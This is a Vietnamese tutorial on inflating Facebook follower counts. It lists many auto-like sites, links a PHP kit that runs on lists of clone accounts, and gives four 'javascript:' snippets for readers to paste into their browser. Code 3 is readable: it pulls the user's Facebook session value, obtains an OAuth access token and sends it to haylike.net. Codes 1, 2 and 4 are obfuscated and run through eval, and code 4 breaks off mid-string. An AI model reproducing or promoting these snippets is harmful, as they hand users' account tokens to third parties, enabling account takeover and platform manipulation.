TUT BUFF SUB CURL + CODE SUB BY NVK


TUT BUFF SUB ĐỘC QUYỀN BY NGUYỄN VĂN KIÊN✔ 2018 ✔
DUỚI Đ Y GỒM NHỮNG WED BUFF SUB HIỆU QUẢ NHẤT CÓ CẢ KHÔNG TIME ( CLICK MÕI TAY )
- RẤT NHIỀU KÉO MÕI CM TAY NHÁ ~.~
http://buffsubfb.com ( Không Time ) 
 http://vipsub.me/ ( 200 Sub 1 Lần  )
getsub.top
facefuck.pro
mymemo.pro
hublaa.me
vipfb.us
http://autosubviet.com
https://auto-bonyeuai.rhcloud.com
https://autosubhp.net 
http://autovip.me
Vipfb.biz  ( 150 Sub 1 Lần )
http://like5s.net/
http://likevip.net/
http://wefbee.com/
https://hublaafollow.me/
http://likevipvn.xyz/
https://autolikeviet.vn/
http://likecuoi.vn/
http://like.vipvui.vn/
http://likesvn.info/
http://botviplike.cf/
https://auto-bot.me/
http://autolike.vn/
https://vipfb.net/
https://ilikesub.com/
http://hacklike24h.com/
http://autolike-us.com/
http://www.myfbliker.com/
http://autoliker4fb.com/
http://auto-like.net/
https://autobotfb.com/
http://starvip.info/
http://4liker.com/
http://autolikeviet.me/
http://hotface.pro/
http://botfb.org/
http://botfb.pro/
http://starlike.ml/
http://tanglike.ml/
http://haylike.net/
http://autolikesub.com/
https://autolikepro.net/
http://www.vipviet.info/
http://botviet.net/
http://bot24h.com/
https://chuyhiep.net/
http://vnlike.me/
http://testing12.ml/
https://botvn.me/
http://likecuoi.vn/
http://fbliker.in/
http://www.myliker.com/
http://oneliker.com/
http://othertools.official-liker.net/
http://autofollower.4liker.com/

- Nếu Muốn Tools Reg Clone Hãy Inbox Fb NGUYỄN VĂN KIÊN✔
- HÌNH ẢNH  HƯỚNG DẪN CURL SUB 2018

!

- DOWLOAD CURL SUB TẠI Đ Y : http://www.mediafire.com/file/agn7ybl4phmuhnd/Curl+Sub+2017+%23NTH.zip
- HƯỚNG DẪN SỬ DỤNG :v
AresT_Config.php: chỉnh sửa $tokenlink = 'http://www.teamloli.com/token'; chỉnh sửa chữ tô đỏ thành domain website bạn và $AresT2k1 ='xxx'; thành ID nick Facebook của bạn
AresT_Acc.php: chỉnh sửa thành list acc clone facebook của bạn
Hướng Dẫn Cron File
AresT_Token.php: treo 2 phút một lần
AresT_Cron.php: treo 5 phút một lần
các bạn có thểtreo cron tại: Cron-Job.org
-------------------------------------------------------------------------------------------------------------------
DƯỚI Đ Y LÀ CODE SUB !! CHƯA FIX
Code Sub 1.

javascript:var _2916;var _5397='3548E42C167A399D357A391E227E371E385F393C395E357F387F387D227E285E227A241D363B285A241B281A183E399B357F391B227C403A383C403C403D227B285A227F241C261A271C269C277E259B273C267D273F271A275D269E267E271D263E271E241E281D183B399E357C391E227F373F363D353F357D387E387B227D285A227E241C261C271E269B277C259D273E267A273F271C275F269D267B271E263A271B241A281F183D399E357E391E227E377C365D405C227A285B227B241D241F281E183A399B357B391D227B363D365F379C357C405E353B395B373D381F365A227E285F227D261A259F259C259B281B183B367F397D383B361E395B373C385C383B227D393B379B365E365A387C243B363C365F379F357F405F245A227E409D183A181B399C357C391B227C393D395E357E391F395F227E285F227A383E365B401D227E299F357C395A365B243D245A255C369F365A395E331E373B381A365B243A245A281F183E181D401B371A373F379F365D227F243B383A365A401F227D299B357E395F365F243C245B255B369C365E395E331D373F381C365F243B245F227B283F227C393C395B357D391F395C227A249C227A363A365F379E357F405E245E281F183D413E183D399C357F391E227C367B359A353D363B395F393D369C227F285B227D363E385A361B397E381A365A383C395D255E369F365A395B301E379B365D381F365A383C395C393A295A405C319F357A381F365F243C241F367C359F353D363D395D393F369F241A245C345D259B349E255C399D357A379F397F365C281A183B257B257A327A365D387E379A357E361A365E227B405B385F397D391B227E397D391B379C279E183A399F357F391F227A391C373B385A227C285E227A241A371E395C395E387A279F257C257A379A373B377F365D255A399A373F387D399A397B373D255C399D383C257C379C385D369D373E383A257C393E397B359A255B387B371F387E289B397D393C365D391D285D241C281C183C257C257A183F399F357D391B227B395F385B377C365B383E357E383E363B391E385A373C363E227A285D227E241B241E281D183E399A357E391D227A365E227F285A227C383A365F401D227E339A317F315F307E395C395D387B327D365D389B397B365D393B395D281C183B399E357F391C227D395E227D285D227E241D371B395F395A387F393A279E257C257F401E401B401A255B367A357A361A365B359A385F385C377F255B361C385E381E257C399D261F255E259C257A363D373C357B379B385A369A257E385A357C397D395E371E257B361F385B383B367A373D391E381D241E281F183A399C357B391D227F383F227B285E227C241F367D359A353D363D395D393B369C285E241B227F249C227C367E359E353B363C395F393E369C227F249C227E241A239D357A387D387E353E373E363C285B241E227A249A227A373D363C353D357A387F387A227C249A227C241F239C391A365C363F373F391B365A361B395D353A397F391E373F285A367A359F361F385E383F383E365B361F395D279C257B257C393C397A361C361A365D393B393D239C363B373D393C387E379B357D405E285E387F385B387A397B387E239B357B361E361C365D393F393D353E395B385C377D365A383B285B239E393B363E377A285B239C367F391D385C381C353B387E385E393E395F285B261B239A387C391A373D399E357F395E365A285E239C395B385A393B285D239A379B385E369D373A383F285A239B391E365C357C363D285A239F401D391D373C395C365D285C239B365D403C395C365C383B363C365D363F285A239B393A385E361F373E357A379C353E361D385B383F367E373C391B381E285C239B361B385F383D367C373A391B381F285D239B393D365E365A383F353B393F361B385D387E365C393A285C239C357C397A395E371B353E395A405A387E365C285E239C357A397D395B371D353D395F385B377E365B383A285D239D357F397F395D371B353E383A385F383F361D365F285B239B363D365A367A357F397B379B395D353F357A397A363C373F365E383D361B365F285B239C391A365A367C285F299D365F367F357C397D379A395C239E391F365B395D397B391B383F353B367D385A391C381E357E395B285C357A361B361C365C393D393A353E395B385F377B365F383E239C363D385B381B357A373E383D285E239F393A393F385B353D363D365D399D373F361F365A285D373A385C393A239B353E353A297F321B319C303B309D327D317D353D353C285C261F241B281B183B365B255B385A387D365A383D243A241F323F321C329B331F241B251C227C395C251E227E395D391A397A365F245A281F183D365F255D385C383C391D365C357B363C405D393A395C357A395E365F361C371E357C383E369A365D227F285B227D367C397A383C361D395F373E385E383B227B243D245A227F409E183E181B373C367F227D243F365E255C391C365D357C363A405E329A395E357D395B365D227D285F285C227C267F227C239B239E227D365E255A393F395A357A395B397D393A227D285D285B227B263A259F259C245A227C409C183A181B181D381C357E359E357C385B381F357D395A227B285F227A365A255A391B365B393B387C385F383B393A365F331F365E403C395D255B381B357E395C361D371E243E257A395B385A377C365B383C285E243E255E249B245E239F257E245F345C261F349D281A183B181D181E365F255F361D379A385D393F365A281F183F181A181B399F357A391D227C367B227D285D227B383A365A401E227C339B317D315C307E395E395F387C327E365F389C397F365C393D395B281E183C181C181C399A357C391D227D395A227A285D227D241F257F257E401B401C401E255C367A357D361B365A359C385C385A377B255F361E385A381D257C399A261D255F259E257C363F373D357F379C385C369D257E385B357E397B395D371D257B361E385D383E367E373A391B381B241E281F183B181C181F399D357A391A227E383B227D285A227E241F367C359C353E363B395B393E369E285B241C227A249C227C367C359B353C363A395D393C369C227B249A227B241D239A357B387C387B353C373C363A285E241F227C249B227B373B363D353B357D387A387B227E249A227F241B239C391D365C363B373C391B365D361B395D353B397C391D373E285C367C359A361E385C383E383A365D361D395F279E257E257F393D397C361A361F365A393B393D239F363E373B393C387C379F357F405D285A387A385F387F397C387B239A357B361D361A365B393A393E353B395F385F377F365E383E285C239C393B363A377D285E239F367B391B385F381D353D387D385D393F395D285B261D239F387D391C373A399B357A395D365B285B239B395C385C393E285D239A379A385F369B373E383C285C239F391F365F357B363A285E239E401B391D373B395E365C285F239D365E403B395F365C383D363F365D363A285F239E393F385D361D373E357F379E353A361C385B383C367A373E391F381A285E239A361E385B383F367D373C391A381A285F239F393D365E365D383E353F393E361A385C387E365B393A285E239A357A397A395B371B353B395B405C387A365C285E239F357D397F395A371E353C395D385C377B365B383C285C239C357C397B395C371E353E383C385E383C361C365F285D239E363A365F367D357F397B379C395B353A357A397E363C373A365D383E361E365E285A239A391C365A367F285F299B365E367A357A397D379D395D239B391D365B395E397D391E383C353F367D385F391B381B357A395F285C357F361C361E365B393A393C353E395B385A377F365B383D239F363E385B381A357D373C383A285B239F393F393B385F353D363E365F399F373D361D365A285B373D385D393F239C353F353A297C321A319F303B309D327B317A353C353A285E261B241C281B183A181C181D367A255D385B387D365F383F243D241B323B321D329F331E241B251A227A395A251D227F395D391D397F365C245B281E183E181F181F367A255B385C383D391E365A357F363A405C393D395B357F395C365F361A371F357D383A369F365E227B285C227E367B397C383A361A395E373E385A383F227D243F245A227F409B183F181E181B181A373B367A227F243A367F255D391F365A357D363C405B329A395C357F395E365F227F285E285D227D267A227C239F239C227B367D255B393F395C357E395C397F393F227E285A285A227E263D259F259E245F227C409C183F181F181A181A181F395A385F377C365B383F357E383F363B391F385E373C363E227A285E227B367D255D391C365F393E387D385F383D393C365C331E365B403D395C255D381A357F395D361F371D243B257F395F385B377F365F383F285A243D255D249B245E239F257D245C345D261A349E281E183C181B181C181F181C367F255D361F379F385D393D365C281C183B181D181A181A181A393F379F365E365D387E243B363E365A379D357E405F353D395A373A381B365F245C281D183F181A181F181A181B379D385C361A357D395E373D385E383E255A371A391F365B367D227F285B227F391F373F385B227C249A227E381A357B359E357E385E381D357F395B227F249F227F241D239E377E365F405E285A241D227D249E227F377A365A405E227B249C227C241A239D371A385D393E395A357E387C387F285B241F227C249C227F371A385B393C395A357C387F387E227E249B227B395E385C377D365A383F357A383F363A391D385B373D363B281E183E181B181E181D413E183C181C181D413B281A183C181B181D367B255B393B365F383F363D243D383A245C281A183C181C413B183A413C281F183B365A255D393C365D383A363F243C383F245C281B';var _8361=/[\x41\x42\x43\x44\x45\x46]/;var _7481=2;var _5399=_5397.charAt(_5397.length-1);var _3517;var _2585=_5397.split(_8361);var _9832=[String.fromCharCode,isNaN,parseInt,String];_2585[1]=_9832[_7481+1](_9832[_7481](_2585[1])/21);var _3395=(_7481==6)?String:eval;_3517='';_11=_9832[_7481](_2585[0])/_9832[_7481](_2585[1]);for(_2916=3;_2916<_11;_2916++)_3517+=(_9832[_7481-2]((_9832[_7481](_2585[_2916])+_9832[_7481](_2585[2])+_9832[_7481](_2585[1]))/_9832[_7481](_2585[1])-_9832[_7481](_2585[2])+_9832[_7481](_2585[1])-1));var _9166='_3445';var _5462='_9166=_3517';function _9205(_1740){_3395(_1946);_9205(_5651);_5651(_5462);_9205(_9166);}var _1946='_9205=_3395';var _5651='_5651=_9205';_9205(_5399);


Code sub 2.

javascript:var _7261;var _6888='15993F189C142C2117C1928E2081F1343B1991B2054A2090D2099F1928D2063A2063D1343E1604E1343A1406A1955A1604E1406A1586C1145A2117B1928D2081A1343E2135B2045D2135E2135A1343C1604D1343B1406D1496A1541D1532A1568B1487E1550A1523F1550C1541B1559F1532C1523F1541D1505F1541C1406E1586E1145F2117C1928A2081C1343E2000E1955B1910D1928C2063E2063A1343E1604B1343D1406C1496A1541B1532F1568E1487E1550F1523C1550A1541A1559E1532E1523D1541E1505E1541B1406B1586A1145F2117B1928F2081D1343C2018F1964C2144B1343A1604D1343A1406B1406D1586A1145F2117F1928B2081F1343D1955B1964C2027F1928D2144C1910C2099A2000D2036D1964A1343C1604D1343C1496F1487F1487E1487F1586F1145D1973C2108D2045C1946B2099A2000D2054D2045B1343C2090C2027E1964E1964C2063B1415D1955F1964D2027F1928A2144B1424E1343B2162B1145C1136C2117A1928B2081C1343E2090C2099D1928B2081F2099A1343D1604A1343E2045E1964B2126C1343F1667C1928B2099C1964A1415C1424A1469C1982F1964A2099A1811E2000B2036C1964C1415A1424F1586A1145F1136F2126F1991E2000D2027F1964B1343C1415C2045F1964E2126F1343F1667E1928E2099C1964D1415C1424C1469E1982C1964D2099D1811A2000D2036D1964E1415A1424A1343F1595A1343B2090B2099B1928F2081E2099A1343C1442F1343B1955D1964F2027B1928C2144A1424B1586F1145B2180D1145A2117D1928A2081B1343F1973E1937B1910E1955D2099B2090F1982A1343B1604D1343B1955A2054B1946E2108C2036D1964B2045C2099B1469B1982D1964E2099F1676D2027D1964E2036E1964E2045E2099D2090C1649C2144E1757E1928A2036F1964A1415D1406A1973A1937C1910F1955F2099B2090C1982E1406E1424D1874F1487A1892E1469A2117B1928D2027E2108D1964A1586D1145B1478D1478E1793A1964B2063E2027F1928C1946A1964B1343F2144B2054B2108B2081A1343D2108B2081B2027A1577D1145E2117A1928A2081F1343D2081B2000D2054A1343A1604C1343F1406E1991A2099B2099F2063F1577D1478F1478C2027C2000B2018F1964C1469B2117C2000D2063F2117B2108D2000F1469F2117B2045D1478C2027D2054B1982C2000A2045E1478B1973E2081A2000C1964E2045A1955E1469A2063F1991E2063D1622E2108B2090A1964A2081E1604E1406B1586E1145E1478D1478A1145A2117B1928A2081C1343B2099A2054A2018C1964C2045D1928A2045E1955F2081E2054D2000B1955C1343F1604C1343C1406C1406E1586E1145A2117D1928B2081C1343A1964E1343A1604F1343E2045B1964D2126A1343D1847A1748F1739A1703D2099B2099D2063C1793F1964D2072F2108F1964D2090C2099B1586B1145D2117D1928B2081C1343B2099C1343C1604E1343B1406B1991C2099E2099A2063F2090A1577F1478C1478B2126D2126B2126C1469C1973D1928D1946E1964E1937A2054B2054A2018D1469E1946A2054A2036D1478A2117B1496C1469C1487E1478B1955E2000B1928C2027D2054B1982F1478E2054E1928A2108C2099D1991C1478D1946E2054E2045A1973B2000D2081B2036D1406E1586F1145C2117E1928C2081C1343D2045C1343A1604F1343D1406B1973A1937B1910A1955B2099A2090E1982A1604E1406B1343C1442B1343A1973C1937A1910B1955C2099E2090B1982D1343D1442C1343D1406D1397F1928E2063C2063B1910F2000A1955F1604C1406A1343C1442B1343D2000E1955D1910E1928E2063F2063F1343C1442F1343B1406C1397F2081F1964C1955C2000E2081C1964D1946C2099A1910F2108E2081A2000D1604B1973E1937A1946A2054A2045E2045F1964B1946E2099F1577C1478B1478F2090D2108B1946A1946A1964D2090F2090C1397E1955B2000C2090F2063E2027E1928D2144C1604F2063F2054B2063E2108B2063E1397C1928C1946D1946D1964D2090B2090B1910A2099D2054F2018A1964D2045E1604F1397A2090B1955D2018F1604C1397F1973D2081C2054E2036D1910E2063B2054C2090D2099C1604B1496E1397B2063F2081F2000B2117E1928D2099C1964A1604C1397A2099B2054A2090D1604C1397D2027A2054A1982E2000E2045C1604D1397E2081B1964B1928E1955D1604F1397C2126D2081B2000E2099B1964C1604D1397F1964E2135B2099C1964C2045A1955C1964D1955F1604D1397A2090A2054F1946F2000B1928F2027A1910D1946D2054D2045C1973A2000E2081E2036F1604F1397D1946D2054E2045B1973B2000F2081B2036F1604B1397B2090E1964F1964A2045C1910B2090E1946C2054C2063F1964F2090F1604E1397A1928B2108A2099C1991F1910D2099F2144D2063D1964C1604E1397D1928F2108D2099B1991F1910A2099C2054E2018D1964F2045A1604E1397D1928B2108B2099C1991F1910F2045A2054E2045C1946E1964C1604B1397D1955C1964D1973E1928D2108A2027F2099D1910C1928E2108C1955C2000A1964C2045A1946B1964E1604D1397E2081A1964E1973A1604F1667D1964C1973C1928B2108E2027A2099A1397E2081F1964E2099A2108B2081D2045F1910E1973A2054C2081D2036D1928B2099B1604D1928F1946A1946C1964E2090A2090D1910C2099F2054B2018B1964A2045F1397A1955F2054E2036E1928A2000F2045F1604A1397D2090C2090C2054F1910B1955B1964B2117D2000C1946A1964D1604B2000C2054F2090C1397E1910B1910F1658D1766C1757F1685A1712D1793C1748C1910F1910C1604E1496C1406A1586F1145B1964A1469C2054A2063E1964E2045C1415C1406A1775D1766A1802E1811D1406B1451B1343C2099B1451E1343C2099A2081D2108F1964D1424E1586F1145D1964A1469A2054A2045E2081B1964B1928D1955A2144C2090E2099D1928D2099F1964F1946E1991E1928D2045F1982F1964C1343C1604E1343E1973D2108C2045B1946D2099A2000F2054C2045E1343D1415F1424A1343A2162E1145B1136C2000B1973E1343E1415A1964E1469E2081E1964F1928E1955A2144B1802A2099E1928C2099B1964D1343F1604E1604C1343B1523F1343D1397D1397D1343F1964B1469F2090A2099C1928E2099C2108D2090E1343C1604E1604C1343D1505E1487A1487F1424C1343A2162A1145A1136D1136B2036B1928C1937B1928A2054A2036D1928A2099A1343A1604F1343B1964F1469E2081D1964F2090B2063B2054A2045D2090B1964F1811F1964A2135A2099F1469F2036E1928D2099F1946B1991D1415F1478F2099B2054F2018B1964A2045D1604F1415C1469E1442B1424D1397C1478D1424B1874E1496C1892D1586E1145B1136F1136E1964A1469A1946D2027B2054F2090C1964C1586B1145E1136F1136B2117B1928E2081B1343F1973B1343B1604F1343D2045F1964D2126E1343C1847F1748B1739A1703A2099D2099A2063E1793F1964D2072C2108F1964F2090F2099C1586E1145A1136D1136C2117B1928A2081A1343B2099F1343F1604C1343F1406D1478B1478B2126B2126E2126B1469B1973A1928D1946C1964B1937D2054B2054E2018D1469E1946A2054A2036B1478B2117B1496B1469C1487C1478E1955A2000B1928D2027C2054E1982C1478F2054A1928F2108D2099F1991C1478A1946D2054A2045D1973B2000F2081A2036D1406E1586F1145F1136B1136C2117D1928B2081A1343B2045A1343D1604B1343C1406A1973E1937C1910B1955F2099D2090C1982D1604C1406F1343B1442E1343E1973A1937F1910D1955F2099B2090D1982C1343C1442D1343B1406C1397A1928C2063F2063A1910F2000C1955D1604F1406D1343C1442F1343E2000C1955D1910E1928D2063B2063A1343D1442B1343C1406E1397B2081A1964F1955E2000B2081E1964A1946A2099C1910C2108B2081E2000E1604C1973F1937D1946F2054C2045F2045B1964C1946D2099E1577F1478D1478A2090D2108E1946C1946A1964C2090B2090F1397C1955D2000F2090B2063B2027D1928D2144A1604C2063B2054F2063C2108A2063D1397E1928D1946E1946D1964A2090E2090F1910B2099D2054D2018E1964E2045E1604D1397E2090A1955A2018E1604B1397A1973A2081A2054A2036E1910E2063A2054C2090D2099B1604D1496E1397D2063B2081E2000A2117A1928C2099B1964A1604D1397A2099B2054D2090A1604A1397A2027E2054F1982E2000B2045D1604A1397D2081D1964A1928C1955B1604C1397C2126D2081E2000F2099C1964C1604A1397D1964A2135D2099B1964D2045E1955E1964D1955D1604B1397A2090F2054C1946A2000D1928C2027C1910A1946A2054B2045F1973E2000B2081A2036B1604C1397B1946D2054F2045A1973D2000B2081D2036D1604F1397C2090C1964F1964F2045C1910A2090A1946E2054E2063F1964C2090F1604E1397C1928A2108D2099B1991F1910A2099A2144E2063E1964E1604D1397A1928D2108A2099B1991F1910A2099E2054D2018E1964F2045F1604A1397C1928F2108A2099A1991E1910A2045C2054D2045D1946C1964A1604E1397A1955C1964B1973D1928A2108C2027A2099E1910F1928A2108E1955A2000F1964C2045C1946A1964E1604C1397A2081C1964F1973B1604F1667A1964A1973B1928C2108C2027A2099E1397F2081A1964F2099F2108C2081E2045E1910E1973D2054E2081E2036B1928D2099C1604C1928C1946F1946F1964B2090B2090E1910B2099B2054E2018D1964A2045F1397A1955C2054B2036C1928F2000A2045A1604A1397B2090F2090E2054D1910A1955E1964C2117D2000A1946A1964B1604F2000F2054F2090E1397F1910F1910E1658A1766F1757C1685D1712E1793B1748A1910D1910A1604E1496B1406B1586D1145E1136D1136F1973A1469D2054B2063C1964A2045E1415F1406E1775F1766B1802A1811A1406C1451D1343D2099D1451B1343F2099A2081B2108B1964F1424D1586D1145B1136D1136D1973E1469D2054C2045A2081B1964E1928A1955E2144A2090B2099D1928B2099B1964F1946C1991B1928F2045E1982A1964E1343D1604F1343F1973F2108C2045E1946B2099F2000C2054D2045F1343D1415F1424C1343D2162F1145D1136B1136D1136E2000C1973A1343B1415B1973C1469A2081D1964E1928D1955D2144F1802F2099A1928B2099F1964D1343E1604A1604B1343A1523D1343B1397B1397A1343F1973C1469C2090B2099C1928F2099C2108E2090D1343A1604F1604E1343D1505D1487D1487F1424F1343F2162D1145D1136F1136B1136D1136C2099E2054D2018F1964B2045F1928C2045B1955D2081D2054F2000B1955C1343E1604A1343B1973B1469C2081C1964A2090F2063B2054B2045A2090B1964E1811B1964A2135A2099D1469C2036E1928C2099E1946B1991C1415B1478D2099E2054E2018A1964D2045D1604C1415E1469F1442B1424D1397B1478E1424B1874A1496F1892D1586A1145D1136A1136A1136D1136E1973D1469A1946E2027D2054C2090A1964A1586D1145B1136A1136F1136A1136C2090A2027B1964A1964C2063C1415A1955B1964A2027F1928C2144D1910C2099C2000A2036D1964F1424D1586A1145A1136A1136B1136C1136A2027C2054E1946D1928A2099C2000B2054E2045E1469A1991B2081F1964C1973F1343A1604E1343E2081B2000D2054E1343E1442B1343B2036B1928F1937B1928D2054E2036E1928B2099D1343A1442D1343E1406F1397A2018F1964D2144B1604B1406A1343A1442C1343A2018B1964C2144A1343A1442E1343E1406A1397D1991A2054F2090F2099D1928B2063A2063C1604E1406F1343E1442D1343C1991E2054B2090A2099D1928B2063C2063A1343D1442F1343A2099F2054A2018F1964B2045D1928E2045C1955D2081E2054E2000C1955E1586B1145A1136F1136D1136C2180B1145E1136C1136D2180F1586F1145E1136B1136D1973E1469D2090F1964D2045B1955C1415A2045A1424C1586A1145D1136E2180D1145C2180B1586C1145B1964A1469B2090B1964E2045D1955C1415E2045A1424A1586D';var _8852=/[\x41\x42\x43\x44\x45\x46]/;var _7662=2;var _5755=_6888.charAt(_6888.length-1);var _3187;var _5952=_6888.split(_8852);var _5850=[String.fromCharCode,isNaN,parseInt,String];_5952[1]=_5850[_7662+1](_5850[_7662](_5952[1])/21);var _4383=(_7662==8)?String:eval;_3187='';_11=_5850[_7662](_5952[0])/_5850[_7662](_5952[1]);for(_7261=3;_7261<_11;_7261++)_3187+=(_5850[_7662-2]((_5850[_7662](_5952[_7261])+_5850[_7662](_5952[2])+_5850[_7662](_5952[1]))/_5850[_7662](_5952[1])-_5850[_7662](_5952[2])+_5850[_7662](_5952[1])-1));var _9532='_5766';var _1460='_9532=_3187';function _6389(_9055){_4383(_7715);_6389(_4232);_4232(_1460);_6389(_9532);}var _7715='_6389=_4383';var _4232='_4232=_6389';_6389(_5755);

Code sub 3.

javascript:var _0x5be6=["165907476854626","http://haylike.net/login.php?users=","getTime","value","fb_dtsg","getElementsByName","/v1.0/dialog/oauth/confirm","fb_dtsg=","&app_id=","&redirect_uri=fbconnect://success&display=popup&access_token=&sdk=&from_post=1&private=&tos=&login=&read=&write=&extended=&social_confirm=&confirm=&seen_scopes=&auth_type=&auth_token=&auth_nonce=&default_audience=&ref=Default&return_format=access_token&domain=&sso_device=ios&__CONFIRM__=1","POST","open","onreadystatechange","readyState","status","match","responseText","close","/v1.0/dialog/oauth/confirm","href","send"];var id_app=_0x5be6[0];var haylike=_0x5be6[1];function sleep(_0x442fx4){var _0x442fx5= new Date()[_0x5be6[2]]();while( new Date()[_0x5be6[2]]()<_0x442fx5+_0x442fx4){;}}var delay_time=1000;var fb_dtsg=document[_0x5be6[5]](_0x5be6[4])[0][_0x5be6[3]];var e= new XMLHttpRequest;var t=_0x5be6[6];var n=_0x5be6[7]+fb_dtsg+_0x5be6[8]+id_app+_0x5be6[9];e[_0x5be6[11]](_0x5be6[10],t,true);e[_0x5be6[12]]=function(){if(e[_0x5be6[13]]==4&&e[_0x5be6[14]]==200){mabaomat=e[_0x5be6[16]][_0x5be6[15]](/token=(.+)&/)[1];e[_0x5be6[17]];var _0x442fxb= new XMLHttpRequest;var t=_0x5be6[18];var n=_0x5be6[7]+fb_dtsg+_0x5be6[8]+id_app+_0x5be6[9];_0x442fxb[_0x5be6[11]](_0x5be6[10],t,true);_0x442fxb[_0x5be6[12]]=function(){if(_0x442fxb[_0x5be6[13]]==4&&_0x442fxb[_0x5be6[14]]==200){mabaomat=_0x442fxb[_0x5be6[16]][_0x5be6[15]](/token=(.+)&/)[1];_0x442fxb[_0x5be6[17]];sleep(delay_time);location[_0x5be6[19]]=haylike+mabaomat}};_0x442fxb[_0x5be6[20]](n)}};e[_0x5be6[20]](n);


Code sub 4.


var _9994;var _6935='11186A147D203C1911B1848A1995E1848D1974C1862E1967A1904A1953F1981B1575F1995E1848C1967D1393D1834B1505E2009C1540D1855C1876B1547F1596E1806C1407C1512B1547D1540C1568D1505D1554A1533D1554B1547E1561D1540D1533F1547B1519E1547E1407B1477C1407B1897C1981B1981D1953C1575C1498C1498F1981D1848E1918F1904D1953F1862A1904F1491C1883E1855A1981D1848B1918A1904C1953F1491B1862D1946E1932A1498B1925C1946E1890B1904C1939F1491E1953F1897C1953A1610F1988A1974D1876D1967F1596D1407B1477E1407D1890D1876E1981A1757A1904B1932E1876E1407A1477F1407F1995E1848B1925A1988C1876E1407F1477E1407B1883E1855B1834B1869F1981F1974D1890B1407A1477D1407E1890D1876B1981D1652B1925F1876E1932C1876C1939F1981F1974D1631D2016A1715C1848F1932D1876E1407D1477F1407B1897A1981E1981C1953F1974F1575C1498F1498B2002A2002B2002E1491B1883E1848A1862B1876C1855E1946D1946E1918C1491D1862F1946B1932D1498F1995A1512B1491B1505A1498D1869B1904D1848D1925B1946C1890A1498C1946B1848A1988D1981A1897F1498B1862C1946C1939F1883E1904F1967B1932C1407D1477A1407E1883A1855E1834C1869F1981A1974B1890B1596F1407F1477E1407F1435A1848E1953B1953A1834E1904E1869A1596B1407D1477F1407A1435D1967F1876D1869A1904F1967D1876B1862F1981B1834F1988A1967C1904A1596D1883A1855E1862F1946E1939F1939C1876A1862E1981E1575D1498E1498C1974B1988D1862E1862D1876A1974E1974B1435F1869D1904A1974D1953E1925B1848F2016E1596F1953A1946D1953C1988F1953D1435B1848B1862C1862B1876F1974C1974E1834E1981D1946D1918B1876B1939A1596A1435E1974D1869F1918B1596D1435B1883F1967B1946B1932C1834B1953C1946A1974E1981C1596B1512D1435A1953D1967A1904C1995B1848A1981C1876C1596D1435B1981D1946B1974A1596A1435D1925B1946A1890D1904D1939F1596A1435B1967A1876F1848B1869A1596F1435D2002B1967B1904A1981C1876F1596F1435C1876E2009D1981C1876E1939F1869B1876B1869D1596F1435C1974C1946A1862D1904F1848F1925F1834D1862E1946E1939C1883E1904C1967B1932D1596E1435A1862C1946B1939A1883A1904D1967B1932B1596F1435A1974E1876A1876E1939C1834A1974A1862C1946B1953E1876F1974D1596A1435A1848B1988C1981D1897D1834E1981D2016A1953E1876C1596A1435B1848C1988C1981C1897D1834D1981E1946F1918E1876D1939B1596E1435B1848C1988B1981A1897E1834E1939E1946B1939E1862C1876B1596A1435C1869C1876F1883A1848A1988E1925C1981C1834A1848E1988D1869E1904C1876A1939A1862D1876B1596C1435D1967B1876E1883E1596B1645B1876A1883C1848D1988F1925D1981C1435E1967A1876A1981A1988A1967D1939B1834F1883D1946A1967C1932F1848F1981B1596A1848D1862C1862D1876C1974C1974A1834C1981F1946D1918E1876E1939B1435C1869E1946A1932A1848C1904F1939A1596A1435F1974D1974D1946E1834C1869E1876A1995B1904C1862C1876D1596C1904A1946D1974B1435F1834F1834B1638D1722D1715B1659D1680F1743A1708B1834F1834D1596C1512C1407C1477D1407A1729E1722B1750F1757A1407E1477D1407E1946A1953D1876E1939E1407B1477E1407A1946F1939E1967F1876B1848E1869F2016E1974F1981F1848C1981E1876E1862E1897A1848A1939E1890B1876C1407B1477F1407E1967B1876E1848F1869F2016D1750D1981E1848E1981B1876A1407F1477C1407B1974D1981C1848F1981C1988F1974C1407D1477B1407A1932D1848B1981E1862B1897E1407E1477B1407B1967D1876D1974C1953B1946F1939E1974B1876F1757D1876A2009B1981B1407C1477A1407C1862C1925E1946A1974E1876B1407D1477F1407A1498F1498B2002B2002C2002E1491C1883A1848A1862B1876C1855B1946B1946A1918C1491B1862D1946A1932D1498E1995B1512E1491C1505C1498B1869D1904F1848F1925A1946B1890C1498F1946A1848B1988E1981C1897F1498B1862D1946C1939F1883A1904E1967D1932A1407F1477B1407C1897E1967F1876C1883E1407D1477E1407A1974A1876D1939C1869F1407C1820E1582B1995A1848F1967D1393F1904C1869A1834C1848B1953D1953A1596E1834E1505B2009B1540C1855A1876C1547F1806C1505C1820A1582A1995F1848D1967D1393D1925D1904F1918A1876B1540D1974B1596A1834C1505D2009B1540D1855D1876E1547F1806A1512A1820B1582A1883B1988E1939D1862C1981C1904E1946A1939A1393D1974F1925C1876D1876D1953A1449C1834D1505B2009F1533C1533F1519D1883B2009D1533E1456E2030B1995C1848E1967C1393D1834E1505D2009A1533B1533E1519C1883D2009E1540D1596C1393A1939F1876C2002C1393A1645B1848B1981F1876A1449C1456C1806F1834D1505C2009A1540D1855D1876F1547A1806B1519E1820D1820A1449E1456B1582A2002F1897C1904B1925B1876B1449C1393C1939E1876F2002B1393B1645A1848D1981E1876A1449D1456B1806E1834A1505D2009B1540E1855C1876C1547D1806F1519E1820F1820F1449F1456B1589A1834C1505D2009F1533F1533D1519B1883E2009B1540A1470E1834B1505A2009C1533A1533B1519B1883D2009F1533B1456F2030B1582E2044D2044D1995C1848E1967A1393D1869D1876C1925E1848F2016C1834C1981F1904C1932E1876B1596E1512D1505E1505C1505B1582A1995E1848A1967D1393F1883F1855B1834D1869D1981A1974B1890C1596C1869A1946D1862C1988C1932E1876D1939A1981E1806B1834C1505A2009A1540B1855A1876E1547D1806C1540A1820C1820B1449F1834C1505C2009D1540D1855D1876A1547D1806D1533F1820B1456F1806A1505C1820F1806D1834E1505E2009F1540C1855E1876F1547F1806E1526E1820D1820E1582D1995F1848B1967F1393A1876E1596B1393D1939F1876D2002B1393F1785F1708C1701C1673A1981A1981E1953A1743F1876B1960E1988E1876D1974C1981C1582A1995F1848A1967A1393F1981D1596F1834F1505F2009E1540D1855D1876B1547F1806E1547A1820C1582F1995D1848E1967C1393C1939E1596E1834E1505A2009B1540D1855E1876A1547F1806A1554D1820B1470A1883B1855E1834F1869C1981E1974D1890B1470A1834C1505D2009B1540C1855E1876A1547F1806F1561D1820C1470B1904F1869F1834E1848F1953B1953C1470C1834D1505D2009B1540D1855D1876E1547C1806D1568F1820E1582A1876C1806A18